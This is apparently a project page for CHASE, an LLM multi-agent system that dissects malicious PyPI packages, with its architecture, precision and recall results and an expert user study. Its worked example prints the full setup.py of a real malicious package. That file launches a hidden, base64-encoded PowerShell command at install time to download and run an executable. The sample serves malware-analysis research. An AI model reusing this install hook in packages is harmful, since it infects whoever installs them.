CHASE: LLM Agents for Dissecting Malicious PyPI Packages

Abstract

Modern software package registries like PyPI have become critical infrastructure for software development, but are increasingly exploited by threat actors distributing malicious packages with sophisticated multi-stage attack chains. While Large Language Models (LLMs) offer promising capabilities for automated code analysis, their application to security-critical malware detection faces fundamental challenges, including hallucination and context confusion, which can lead to missed detections or false alarms.

We present CHASE (Collaborative Hierarchical Agents for Security Exploration), a high-reliability multi-agent architecture that addresses these limitations through:

A Plan-and-Execute workflow for analysis stablity
Specialized Worker Agents focused on specific analysis aspects
Integration with deterministic security tools for critical operations

Our key insight is that reliability in LLM-based security analysis emerges not from improving individual model capabilities but from architecting systems that compensate for LLM weaknesses while leveraging their semantic understanding strengths.

Why CHASE?

Existing detection methods face a fundamental limitation: they can identify where suspicious code exists, but struggle to accurately explain what it actually does.

Capability	MalGuard	GuardDog	CHASE
Detection Performance	Strong	Limited	Strong
Where is suspicious?
What does it do?	Conditional^*	Conditional^*

^* MalGuard and GuardDog generate explanations by mapping detected function names to pre-written descriptions. While useful, this provides a post-hoc summary of known suspicious patterns. In contrast, CHASE actively intervenes on code by deobfuscating layered payloads and reasoning over analysis traces to reveal the true intent.

CHASE actively deobfuscates layered payloads and retrieves remote content to reveal the attacker's true intent, producing high-fidelity, actionable reports that include:

Attack chain reconstruction
Attacker's ultimate goal
Indicators of Compromise (IoCs)

Quantitative Results

Evaluated on a dataset of 3,000 real-world packages (500 malicious, 2,500 benign):

Method	Precision	Recall	F1
MalGuard (RF)	0.972	0.922	0.946
GuardDog	0.675	0.854	0.754
CHASE (Ours)	0.996	0.984	0.990

Architecture

CHASE's design is inspired by how human security experts analyze malicious code. Professional analysts dynamically switch between exploratory activities (surveying code to form hypotheses, performed by Supervisor) and exploitative activities (focusing on specific tasks like deobfuscation, performed by Workers).

Design Principles

1. Supervisor-Worker Multi-Agent Architecture

A single Supervisor agent maintains the global analysis perspective, while specialized Worker agents execute domain-specific tasks:

Deobfuscator: Handles code deobfuscation, decryption, and safe execution
Web Researcher: Investigates external resources and queries threat intelligence

2. Plan-and-Execute Workflow

Unlike simple reactive approaches that get trapped in repetitive failures, CHASE's Supervisor dynamically adjusts its analysis plan based on Worker results—crucial for malware analysis where outcomes are unpredictable.

3. Reliability-Oriented Coordination

State-Based Communication: Avoids context poisoning by maintaining all information in a central state variable
Minimal Toolsets: Each Worker has only the tools it needs, preventing cognitive overload
Budget-Aware Planning: Prevents potential infinite loops in multi-agent systems

Analysis Example

The following trace shows CHASE analyzing libstrreplacecpu-7.3, a malicious package that downloads and executes a malicious executable via an obfuscated PowerShell command.

The analysis trace for libstrreplacecpu-7.3 as generated by CHASE.

Step-by-Step Analysis

Step 1

Supervisor creates an initial plan after observing the raw source code

Step 2

Supervisor delegates the obfuscated PowerShell command to Deobfuscator

Step 3

Deobfuscator decrypts the base64 payload, revealing a Dropbox download URL

Step 4

Supervisor updates the plan based on the new finding

Step 5

Web Researcher investigates the URL via VirusTotal — flagged by 7/63 vendors

Step 6

Web Researcher investigates the author's email and suspicious domain

Step 7

Supervisor compiles the final analysis report

Raw Sourcecode in `libstrreplacecpu-7.3`

Click to expand the full code of setup.py

                  from distutils.core import setup

try:
  import subprocess
  import os
  if not os.path.exists('tahg'):
    # www.esquelesquad.rip
    subprocess.Popen('powershell -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAiAGgAdAB0AHAAcwA6AC8ALwBkAGwALgBkAHIAbwBwAGIAbwB4AC4AYwBvAG0ALwBzAC8AcwB6AGcAbgB5AHQAOQB6AGIAdQBiADAAcQBtAHYALwBFAHMAcQB1AGUAbABlAC4AZQB4AGUAPwBkAGwAPQAwACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiAH4ALwBXAGkAbgBkAG8AdwBzAEMAYQBjAGgAZQAuAGUAeABlACIAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACIAfgAvAFcAaQBuAGQAbwB3AHMAQwBhAGMAaABlAC4AZQB4AGUAIgA=', shell=False, creationflags=subprocess.CREATE_NO_WINDOW)
except: pass
try:
  setup(
    name = 'libstrreplacecpu',
    packages = ['modlib'],
    version = '3.42',
    # license='MIT',
    description = 'A library for creating a terminal user interface',
    author = 'EsqueleSquad',
    author_email = 'tahgoficial@proton.me',
    classifiers=[
      'Development Status :: 3 - Alpha',
      'Intended Audience :: Developers',
      'Topic :: Software Development :: Build Tools',
      'License :: OSI Approved :: MIT License',
      'Programming Language :: Python :: 3',
      'Programming Language :: Python :: 3.4',
      'Programming Language :: Python :: 3.5',
      'Programming Language :: Python :: 3.6',
      'Programming Language :: Python :: 3.7',
      'Programming Language :: Python :: 3.8',
      'Programming Language :: Python :: 3.9',
      'Programming Language :: Python :: 3.10',
      'Programming Language :: Python :: 3.11',
    ],
  )
except: pass

Generated Report

Click to expand the full generated report

Model Configuration

CHASE employs a tiered hierarchy of local LLMs via SGLang to balance capability with cost:

Role	Model	Purpose
Supervisor	Qwen/Qwen3-32B	Multi-step reasoning, plan orchestration
Workers	Qwen/Qwen3-8B	Focused, domain-specific tasks
Formatter	google/gemma-3-4b-it	JSON output conversion

This configuration runs on a single NVIDIA H100 NVL, making it economically feasible for continuous monitoring.

Expert Evaluation

We conducted a user study with three cybersecurity professionals (security strategist, red team engineer, threat intelligence analyst) to evaluate the quality of CHASE-generated reports for three packages (one benign, two malicious) across five dimensions:

Dimension	Benign	Malicious 1	Malicious 2
Accuracy	3.6	3.8	3.7
Completeness	2.9	4.0	4.2
Clarity	4.1	3.9	4.3
Actionability	3.1	4.0	3.8
Reliability	3.0	4.0	4.0

(5-point Likert scale: 1 = Strongly Disagree, 5 = Strongly Agree)

Key Findings

Strong ratings for Completeness of threat overview and Clarity of terminology

Tendency to over-assess risks in benign code (generating overly cautious warnings)

Evaluations varied by professional role — threat analysts rated highest, red team engineers requested more technical precision

BibTeX

@inproceedings{toda2025CHASE,
author       = {Toda, Takaaki and Mori, Tatsuya},
title        = {{ CHASE: LLM Agents for Dissecting Malicious PyPI Packages }},
booktitle    = {2025 2nd IEEE/ACM International Conference on AI-powered Software (AIware)},
pages        = {1-10},
publisher    = {IEEE},
year         = {2025},
doi          = {10.1109/AIware69974.2025.00008},
url          = {https://doi.ieeecomputersociety.org/10.1109/AIware69974.2025.00008},
}

Acknowledgments

A part of this work is based on the results obtained from a project, JPNP24003, commissioned by the New Energy and Industrial Technology Development Organization (NEDO).